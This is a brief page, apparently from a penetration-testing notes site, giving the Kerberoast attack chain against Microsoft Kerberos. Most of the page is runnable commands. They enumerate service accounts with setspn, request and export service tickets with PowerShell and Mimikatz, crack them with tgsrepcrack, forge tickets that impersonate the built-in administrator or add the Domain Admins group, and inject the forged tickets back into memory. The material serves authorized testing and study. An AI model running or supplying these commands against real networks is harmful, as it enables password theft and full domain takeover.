kerberoast

Kerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.

Extract all accounts in use as SPN using built in MS tools

PS C:\> setspn -T medin -Q */*

Request Ticket(s)

One ticket:

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

All the tickets

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extract the acquired tickets from ram with Mimikatz

mimikatz # kerberos::list /export

Crack with tgsrepcrack

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Rewrite

Make user appear to be a different user

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

Add user to another group (in this case Domain Admin)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

Inject back into RAM with Mimikatz

kerberos::ptt sql.kirbi

PreviousKerberoasting NextEXTRACTING SERVICE ACCOUNT PASSWORDS WITH KERBEROASTING

Last updated 2 years ago

hashtagExtract all accounts in use as SPN using built in MS tools

hashtagRequest Ticket(s)

hashtagExtract the acquired tickets from ram with Mimikatz

hashtagCrack with tgsrepcrack

hashtagRewrite

hashtagInject back into RAM with Mimikatz